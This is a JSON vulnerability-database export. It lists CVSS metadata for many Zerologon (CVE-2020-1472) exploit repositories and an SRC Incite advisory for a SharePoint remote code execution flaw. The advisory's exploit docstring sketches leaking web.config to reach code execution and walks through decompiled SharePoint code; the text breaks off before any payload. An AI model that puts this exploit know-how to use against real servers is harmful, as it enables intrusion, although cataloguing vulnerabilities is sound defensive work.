"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-18T05:46:12", "id": "0CFAB531-412C-57A0-BD9E-EF072620C078", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-15T21:36:46", "description": "# 
Zerologon (CVE-2020-1472)\nThis script is made for bulk checkin...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T18:45:44", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-15T19:52:37", "id": "49EC151F-12F0-59CF-960C-25BD54F46680", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:28:29", "description": "## A\u00e7\u0131klama\n\nZafiyetli \u015fifreleme protokol\u00fc, netlogon protokol\u00fcnd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-29T20:43:06", "type": "githubexploit", 
"title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-06T15:04:14", "id": "2255B39F-1B91-56F4-A323-8704808620D3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:16", "description": "# Set-ZerologonMitigation\nProtect your domain controllers agains...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T16:10:26", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-10-13T15:41:20", "id": "7078ED42-959E-5242-BE9D-17F2F99C76A8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:26", "description": "# ZeroLogon testing script\n\nA Python script that uses the Impack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-30T07:45:50", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-30T07:57:36", "id": "28D42B84-AB24-5FC6-ADE1-610374D67F21", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:26", "description": "# CVE-2020-1472\nCVE 2020-1472 Script de validaci\u00f3n \n\nAssumption:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-24T20:05:21", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T20:08:43", "id": "879CF3A7-ECBC-552A-A044-5E2724F63279", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:29:48", "description": "# Windows NetLogon \u6743\u9650\u63d0\u5347\u6f0f\u6d1e\u590d\u73b0\uff08CVE-2020-1472\uff09\n\n\u9700\u5c06impacket.z...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-26T08:31:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, 
"cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-09-01T09:13:51", "id": "042AB58A-C86A-5A8B-AED3-2FF3624E97E3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:31:50", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-21T07:24:03", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T07:24:16", "id": "B7C1C535-3653-5D12-8922-4C6A5CCBD5F3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": 
"2022-03-23T17:37:26", "description": "# CVE-2020-1472 POC\nRequires the latest impacket from [GitHub](h...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T23:15:41", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T23:15:54", "id": "C7F6FB3B-581D-53E1-A2BF-C935FE7B03C8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:32:45", "description": "# CVE-2020-1472-Easy\nThis is definitely not something you would ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-19T20:44:40", "type": 
"githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-19T21:27:41", "id": "AEF449B8-DC3E-544A-A748-5A1C6F7EBA59", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-07-07T07:28:43", "description": "# Zer0Dump\n\nZer0dump is an PoC exploit/tool for abusing the vuln...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-14T19:27:14", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-07-06T23:37:31", "id": "C5B49BD0-D347-5AEB-A774-EE7BB35688E9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:36", "description": "<b>[CVE-2020-1472] Netlogon Remote Protocol Call (MS-NRPC) Privi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T09:22:30", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-10-24T06:02:52", "id": "2E71FF50-1B48-5A8E-9212-C4CF9399715C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T17:33:37", "description": "# CVE-2020-1472 - Zero-Logon POC\n\n\r\n\u5b9e\u6218\u4e2d\u53ef\u4ee5\u4f7f\u7528secretsd...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": 
"NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:11:49", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-04-18T11:22:10", "id": "DEC5B8BB-1933-54FF-890E-9C2720E9966E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-08-09T02:11:36", "description": "# CVE-2020-1472 POC\nmac\u73af\u5883\u4e0b\u901a\u8fc7proxychains\u4ee3\u7406\u7684\u65b9\u5f0f\u5728window\u57df\u73af\u5883\u4e2d\u590d\u73b0\u8be5\u6f0f\u6d1e\u3002\n\n\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-16T03:40:47", "type": "githubexploit", "title": "Exploit for Use of Insufficiently Random Values in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2022-08-08T02:18:20", "id": "F472C105-E3B1-524A-BBF5-1C436185F6EE", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "srcincite": [{"lastseen": "2022-04-20T17:15:48", "description": "**Vulnerability Details:**\n\nThis vulnerability allows remote attackers to execute arbitrary code on affected installations of SharePoint Server. Authentication is required to exploit this vulnerability.\n\nThe specific flaw exists within the DataFormWebPart class. The issue results from the lack of proper validation of user-supplied data which can result in a server side include. An attacker can leverage this vulnerability to execute code in the context of the local Administrator.\n\n**Affected Vendors:**\n\nMicrosoft\n\n**Affected Products:**\n\nSharePoint Server\n\n**Vendor Response:**\n\nMicrosoft has issued an update to correct this vulnerability. 
More details can be found at: <https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952>\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-07-06T00:00:00", "type": "srcincite", "title": "SRC-2020-0022 : Microsoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-16952"], "modified": "2020-10-13T00:00:00", "id": "SRC-2020-0022", "href": "https://srcincite.io/advisories/src-2020-0022/", "sourceData": "#!/usr/bin/python3\r\n\"\"\"\r\nMicrosoft SharePoint Server DataFormWebPart CreateChildControls Server-Side Include Remote Code Execution Vulnerability\r\nPatch: https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-16952\r\n\r\n## Summary:\r\n\r\nAn authenticated attacker can craft pages to trigger a server-side include that can be leveraged to leak the web.config file. 
The attacker can leverage this to achieve remote code execution.\r\n\r\n## Notes:\r\n\r\n- this does not require the use of a SharePoint endpoint such as WebPartPagesWebService\r\n- the attacker needs AddAndCustomizePages permission enabled which is the default\r\n- you will need to compile and store ysoserial.net in the same folder as this exploit\r\n\r\n## Vulnerability Analysis:\r\n\r\nInside of the Microsoft.SharePoint.WebPartPages.DataFormWebPart we can observe the `CreateChildControls`\r\n\r\n```c#\r\nnamespace Microsoft.SharePoint.WebPartPages\r\n{\r\n [XmlRoot(Namespace = \"http://schemas.microsoft.com/WebPart/v2/DataView\")]\r\n [ParseChildren(true)]\r\n [Designer(typeof(DataFormWebPartDesigner))]\r\n [SupportsAttributeMarkup(true)]\r\n [AspNetHostingPermission(SecurityAction.LinkDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.LinkDemand, ObjectModel = true)]\r\n [AspNetHostingPermission(SecurityAction.InheritanceDemand, Level = AspNetHostingPermissionLevel.Minimal)]\r\n [SharePointPermission(SecurityAction.InheritanceDemand, ObjectModel = true)]\r\n public class DataFormWebPart : BaseXsltDataWebPart, IDesignTimeHtmlProvider, IPostBackEventHandler, IWebPartRow, ICallbackEventHandler, IConnectionData, IListWebPart\r\n {\r\n \r\n // ...\r\n [SharePointPermission(SecurityAction.Demand, ObjectModel = true)]\r\n protected override void CreateChildControls()\r\n {\r\n if (!this.Visible)\r\n {\r\n return;\r\n }\r\n if (!this.AreAllConsumerInterfacesFulfilled())\r\n {\r\n this._deferredXSLTBecauseOfConnections = true;\r\n return;\r\n }\r\n if ((base.DesignMode && this.AllowXSLTEditing) || this._forAJAXDropDown)\r\n {\r\n return;\r\n }\r\n if (this.IsMondoCAMLWebPart() && !base.DesignMode && !string.IsNullOrEmpty(this.ListName) && !this.IsForm)\r\n {\r\n SPContext context = SPContext.GetContext(this.Context, base.StorageKey, new Guid(this.ListName), this.CurrentWeb);\r\n if (context != null)\r\n {\r\n SPViewContext 
viewContext = context.ViewContext;\r\n if (this is BaseXsltListWebPart)\r\n {\r\n BaseXsltListWebPart baseXsltListWebPart = this as BaseXsltListWebPart;\r\n if (baseXsltListWebPart.view != null)\r\n {\r\n viewContext.View = baseXsltListWebPart.view;\r\n }\r\n }\r\n if (viewContext != null && base.RenderMode != RenderMode.Design && base.RenderMode != RenderMode.Preview)\r\n {\r\n viewContext.RedirectIfNecessary();\r\n }\r\n }\r\n }\r\n base.CreateChildControls();\r\n this.AddDataSourceControls();\r\n UpdatePanel updatePanel = null;\r\n if (this.AsyncRefresh)\r\n {\r\n this.CreateAsyncPostBackControls(ref updatePanel);\r\n this.AddAutoRefreshTimer(updatePanel);\r\n }\r\n if (base.DesignMode || !this.InitialAsyncDataFetch || this.Page == null || this.Page.IsCallback)\r\n {\r\n this.EnsureDataBound(); // 1\r\n }\r\n else\r\n {\r\n this._asyncDelayed = true;\r\n if (this.SPList != null && this.SPList.HasExternalDataSource)\r\n {\r\n this.deferXsltTransform = false;\r\n this.EnsureDataBound();\r\n }\r\n string text = Utility.MakeLayoutsRootServerRelative(\"images/gears_an.gif\");\r\n string @string = WebPartPageResource.GetString(\"DataFormWebPartRefreshing\");\r\n this._partContent = this._partContent + \"\";\r\n string partContent = this._partContent;\r\n this._partContent = string.Concat(new string[]\r\n {\r\n partContent,\r\n \"\"\r\n });\r\n this._partContent += \"\";\r\n }\r\n this.EditMode = false;\r\n if (this._partContent != null)\r\n {\r\n if (this.IsForm && this.DataSource is SPDataSource && base.PageComponent != null && this.ItemContext != null)\r\n {\r\n this.ItemContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n bool flag = this.view != null && base.PageComponent != null;\r\n if ((this.IsGhosted || flag) && !this.UseSchemaXmlToolbar && this.ToolbarControl != null)\r\n {\r\n if (base.PageComponent != null)\r\n {\r\n this.ToolbarControl.RenderContext.CurrentPageComponent = base.PageComponent;\r\n }\r\n if ((this.view == null || 
!this.view.IsGroupRender) && (!this._asyncDelayed || flag))\r\n {\r\n if (this.AsyncRefresh && updatePanel != null)\r\n {\r\n updatePanel.ContentTemplateContainer.Controls.Add(this.ToolbarControl);\r\n }\r\n else\r\n {\r\n this.Controls.Add(this.ToolbarControl);\r\n }\r\n }\r\n }\r\n else\r\n {\r\n this.CanHaveServerControls = true;\r\n }\r\n if (this.CanHaveServerControls && DataFormWebPart.RunatChecker.IsMatch(this._partContent)) // 2\r\n {\r\n if (this._assemblyReferences != null && this._partContent != null)\r\n {\r\n StringBuilder stringBuilder = new StringBuilder();\r\n for (int i = 0; i < this._assemblyReferences.Length; i++)\r\n {\r\n stringBuilder.Append(this._assemblyReferences[i]);\r\n }\r\n stringBuilder.Append(this._partContent);\r\n this._partContent = stringBuilder.ToString();\r\n }\r\n if (base.Web != null)\r\n {\r\n EditingPageParser.VerifyControlOnSafeList(this._partContent, null, base.Web, false); // 3\r\n }\r\n if (this.Page.AppRelativeVirtualPath == null)\r\n {\r\n this.Page.AppRelativeVirtualPath = \"~/current.aspx\";\r\n }\r\n bool flag2 = EditingPageParser.VerifySPDControlMarkup(this._partContent);\r\n if (flag2)\r\n {\r\n ULS.SendTraceTag(595161362U, ULSCat.msoulscat_WSS_WebParts, ULSTraceLevel.Medium, \"Allow DFWP XSL markup {0} to be parsed without parserFilter.\", new object[]\r\n {\r\n this._partContent\r\n });\r\n }\r\n Control control = this.Page.ParseControl(this._partContent, flag2); // 4\r\n SPDataSource spdataSource = this.DataSource as SPDataSource;\r\n bool flag3 = false;\r\n if (this.view != null && !string.IsNullOrEmpty(this.view.InlineEdit))\r\n {\r\n flag3 = this.view.InlineEdit.Equals(\"true\", StringComparison.OrdinalIgnoreCase);\r\n }\r\n SPContext spcontext = null;\r\n if (spdataSource != null && base.Web != null && (spdataSource.DataSourceMode == SPDataSourceMode.ListItem || (spdataSource.DataSourceMode == SPDataSourceMode.List && flag3)))\r\n {\r\n string text3;\r\n if (spdataSource.DataSourceMode == 
